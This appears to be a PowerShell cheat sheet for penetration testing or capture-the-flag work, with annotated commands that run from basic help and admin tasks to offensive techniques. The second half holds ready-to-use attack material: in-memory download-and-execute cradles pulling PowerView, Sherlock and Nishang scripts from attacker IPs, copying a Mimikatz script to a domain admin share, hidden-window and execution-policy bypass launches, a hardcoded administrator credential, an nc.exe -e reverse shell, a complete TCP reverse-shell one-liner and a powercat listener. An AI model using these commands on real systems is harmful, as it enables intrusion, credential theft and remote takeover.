Powershell Fu
-Full : Lists the full help for a topic (syntax, every parameter, remarks)
-Examples : Lists only the examples of how to run a cmdlet (the two switches belong to different parameter sets and cannot be combined on one call)
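#PowerShell Help
help *keyword*
powershell /?
powershell -?
powershell -Help
Get-Help *
#List every help topic whose name contains the word "process" (wildcard, not a literal name)
Get-Help *process*
#Full help / examples for ONE cmdlet. -Full and -Examples live in different
#parameter sets, so "Get-Help X -Full -Examples" errors out; run them separately.
Get-Help Get-Process -Full
Get-Help Get-Process -Examples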
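#List all cmdlets (use -CommandType Function/Alias/Application for the other kinds)
Get-Command -CommandType Cmdlet
#Cmdlets: dump every property of each object instead of the default table view
Get-ChildItem | Format-List *
#Pipelining: one line per distinct process name. Sort on an explicit property;
#Sort-Object -Unique with no property falls back to comparing the objects' string form.
Get-Process | Sort-Object -Property ProcessName -Unique | Select-Object ProcessName
#Directories searched for modules (semicolon-separated; user path first, then system paths)
$Env:PSModulePath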
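#WMI / CIM
#List all WMI/CIM classes (default namespace root/cimv2)
Get-CimClass
#Query a class. Get-CimInstance is the current cmdlet (WS-Man by default, works in
#PowerShell 7); Get-WmiObject is legacy, DCOM-only and not present in PowerShell 6+.
Get-CimInstance -ClassName Win32_Volume
Get-WmiObject -Class Win32_Volume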
#Which alias(es) resolve to a given cmdlet
Get-Alias -Definition Get-ChildItem
#Download/refresh the local help files (needs internet access; writing the
#system help location requires an elevated session)
Update-Help
#Browse the registry like a filesystem (HKLM: and HKCU: are PSDrives; cd is an alias for this)
Set-Location HKLM:\
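#Scouring for files
#-Pattern is a REGEX: 'pass*' means "pas" followed by zero or more "s" and matches far
#more than intended. Use 'pass' (or -SimpleMatch for a literal) to hit password/passwd/etc.
Select-String -Path C:\Users\Dan\*.txt -Pattern 'pass'
#Recursive search by name. -Force also walks hidden/system items;
#-ErrorAction SilentlyContinue drops the access-denied noise from protected directories.
Get-ChildItem -Path $searchinfolder -Filter $filename -Recurse -Force -ErrorAction SilentlyContinue | ForEach-Object { $_.FullName }
#Open (print) a file. Add -Raw to get one string instead of an array of lines.
Get-Content "File name.txt"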
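#Copy a file to a remote admin share over SMB. Quote the whole path once: gluing a
#quoted segment onto a bare word (...\c$\'Program Files') only works through argument-mode
#string concatenation and is easy to get wrong.
Copy-Item .\Invoke-MimikatzEx.ps1 -Destination '\\dcorpadminsrv.dollarcorp.moneycorp.local\c$\Program Files\'
#Hides the PowerShell window during execution. The console can still flash briefly on
#launch, and "-WindowStyle Hidden" on a command line is itself a common detection signature.
powershell.exe -WindowStyle Hidden .\script1.ps1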
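#Add user to a DOMAIN group (needs the ActiveDirectory module / RSAT on the host)
Add-ADGroupMember -Identity <Group> -Members <User>
#Remove user from a DOMAIN group
Remove-ADGroupMember -Identity <Group> -Members <User>
#Add/remove user in a LOCAL group. The LocalAccounts cmdlets take -Group/-Member,
#not -Identity/-Members (the original Remove-LocalGroupMember line would not bind).
Add-LocalGroupMember -Group <Group> -Member <User>
Remove-LocalGroupMember -Group <Group> -Member <User>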
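#Import a module from a path (.psm1/.psd1) or by name from $Env:PSModulePath
Import-Module <modulepath>
#List all commands exported by a module
Get-Command -Module <modulename>
#-Name is an exact match unless wildcarded: "Firewall" alone returns nothing,
#*Firewall* finds e.g. the NetSecurity firewall cmdlets
Get-Command -Name *Firewall*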
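#View truncated output
#Collections inside a property are cut off after 4 items by default; -1 shows them all
$FormatEnumerationLimit = -1
#Widen the rendered line so long values are not wrapped or replaced with "..."
<Command> | Out-String -Width 500
#Out-String returns ONE string by default; -Stream instead emits one string per line,
#which is what you want before piping into Select-String
<Command> | Out-String
<Command> | Out-String -Stream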
#Command history of the current session (in memory only)
Get-History
#PSReadLine also persists every typed command to a file across sessions; this prints its
#path. Clear-History only empties the in-session list, not this file - check it for
#plaintext credentials (offense and forensics alike).
(Get-PSReadLineOption).HistorySavePath
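#Running processes (tasklist is the cmd.exe tool; Get-Process is the cmdlet)
tasklist
Get-Process
#Services - the cmdlet is singular: Get-Service ("Get-Services" does not exist)
Get-Service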
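#Start-menu shortcut directory. PowerShell does not expand cmd-style %appdata%
#inside a string; use the $Env: drive instead.
"$Env:APPDATA\Microsoft\Windows\Start Menu\Programs\Windows PowerShell"
#Run PowerShell with execution policy Bypass for this process only.
#Execution policy is a safety feature against accidental script execution, not a security boundary.
c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -ep bypass
#Check whether the current PROCESS is 64-bit, and whether the OS is
[Environment]::Is64BitProcess
[Environment]::Is64BitOperatingSystem
#From a 32-bit process on 64-bit Windows, the "sysnative" alias bypasses file-system
#redirection and launches the 64-bit PowerShell. The alias only exists for 32-bit callers;
#from a 64-bit process use system32 directly.
c:\windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -ep bypass
#On a 64-bit system, run the 32-bit PowerShell (e.g. to load 32-bit-only DLLs/modules)
c:\windows\sysWOW64\WindowsPowerShell\v1.0\powershell.exe -ep bypass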
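#Base64 encode a script for -EncodedCommand.
#powershell -EncodedCommand expects UTF-16LE ("Unicode") base64, NOT UTF-8.
#-Raw matters: without it Get-Content returns an array of lines, not one string.
$PlainText = Get-Content -Raw "File_to_be_encoded"
$EncodedText = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($PlainText))
#Decode a blob back to readable script (e.g. one recovered from logs or a process command line)
$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))
#Execute the Base64 encoded script
powershell -EncodedCommand $EncodedText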
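#Download files to disk
Invoke-WebRequest -Uri "http://172.16.10.1/PowerView.ps1" -OutFile "PowerView.ps1"
powershell "(New-Object Net.WebClient).DownloadFile('http://10.10.0.172/JuicyPotato.exe','jp.exe')"
#Download & execute in memory. DownloadString + IEX only works for .ps1 TEXT; a binary
#(.exe) must go through DownloadFile above. The fetch is plaintext HTTP and the script runs
#unverified - you are trusting the host and the path. Keep the whole command in one quoted string.
powershell "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/Sher.ps1'); Find-AllVulns"
iex (iwr http://<IP>/PowerView.ps1 -UseBasicParsing)
#Execute commands / script blocks
powershell.exe -Command "& {Get-EventLog -LogName security}"
powershell.exe -Command "& {Import-Module .\Sher.ps1; Find-AllVulns}"
powershell -c "<Command>"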
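#Unzip files
#PowerShell 5+ ships Expand-Archive; the .NET route below also works on older
#PowerShell with .NET 4.5 available.
Expand-Archive -Path "C:\a.zip" -DestinationPath "C:\a"
Add-Type -AssemblyName System.IO.Compression.FileSystem
#Extract $zipfile into $outpath. The directory is created if missing; extraction
#throws if a file it wants to write already exists.
function Unzip {
    param([string]$zipfile, [string]$outpath)
    [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
}
Unzip "C:\a.zip" "C:\a"
#If System.IO.Compression cannot be resolved, load the reference assembly directly:
Add-Type -Path "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\.NETFramework\v4.5\System.IO.Compression.FileSystem.dll"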
Using credentials from PowerShell
Log in as another user from PowerShell
Requires: username and password. The value used below looks like an MD5 hash, but it is passed as a plaintext password and only works if that string IS the account's password - PSCredential/Enter-PSSession do not accept NTLM hashes (use pass-the-hash tooling for that).
Shell access (e.g. nc)
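powershell.exe
#Build a PSCredential. -AsPlainText -Force just wraps the literal string; this is a
#password, not a hash - it works only when the string is the real password.
$username = 'BART\Administrator'
$securePassword = ConvertTo-SecureString -AsPlainText -Force '3130438f31186fbaf962f407711faddb'
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
#Interactive session as that user. Needs WinRM enabled on the target (localhost here) and
#a real console - from a dumb nc shell Enter-PSSession tends to hang, so prefer
#Invoke-Command with a script block in that case.
Enter-PSSession -ComputerName localhost -Credential $credential
Invoke-Command -ComputerName localhost -Credential $credential -ScriptBlock { whoami }
# To get a new shell as Administrator, run this inside the session / script block
# (plaintext reverse shell back to 10.10.14.143:41337; have the listener up first):
cmd.exe /c "C:\inetpub\wwwroot\internal-01\log\nc.exe 10.10.14.143 41337 -e cmd.exe"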
Reverse Shells
#Download and execute
#Each line pulls a .ps1 over plaintext HTTP from the attacker host, runs it in memory with
#iex, then calls a function that script defines (presumably Nishang's Invoke-PowerShellTcp,
#PowerView's Find-LocalAdminAccess, PowerUp's Invoke-AllChecks - verify against what you host).
#Nothing touches disk, but the command line itself is visible in process creation / 4688 logs.
powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.2:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 9001
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.19.99.39/Powerview.ps1'));Find-LocalAdminAccess
powershell.exe iex (iwr http://<IP>/File.ps1 -UseBasicParsing);Invoke-AllChecks
#One-liner Reverse-shell
#Plain (unencrypted) TCP client to 10.200.188.200:45000. Loop: read up to 64 KiB, decode as
#ASCII, run it with iex (stderr merged via 2>&1), send the output plus a 'PS <cwd>> ' prompt
#back, until the peer closes the stream. -nop skips profile scripts; no -ep is needed because
#-c runs a command string, which execution policy does not govern. Start the listener first
#(e.g. nc -lvnp 45000).
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.200.188.200',45000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Powercat
Reverse shell listener (catches the callback; -l listen, -v verbose, -p port)
-t: timeout in seconds - here the listener waits up to 1000 s for a connection before giving up
#Dot-source powercat so its functions are defined in the current session
. .\powercat.ps1
#Listen (-l) verbosely (-v) on TCP 443 (-p) for up to 1000 s (-t). Port 443 blends in with
#HTTPS on the wire, but the payload is plaintext; the host firewall must allow the inbound port.
powercat -l -v -p 443 -t 1000